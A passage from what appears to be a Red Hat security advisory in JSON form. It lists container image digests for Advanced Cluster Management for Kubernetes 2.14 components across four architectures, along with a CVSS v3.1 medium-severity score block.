"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
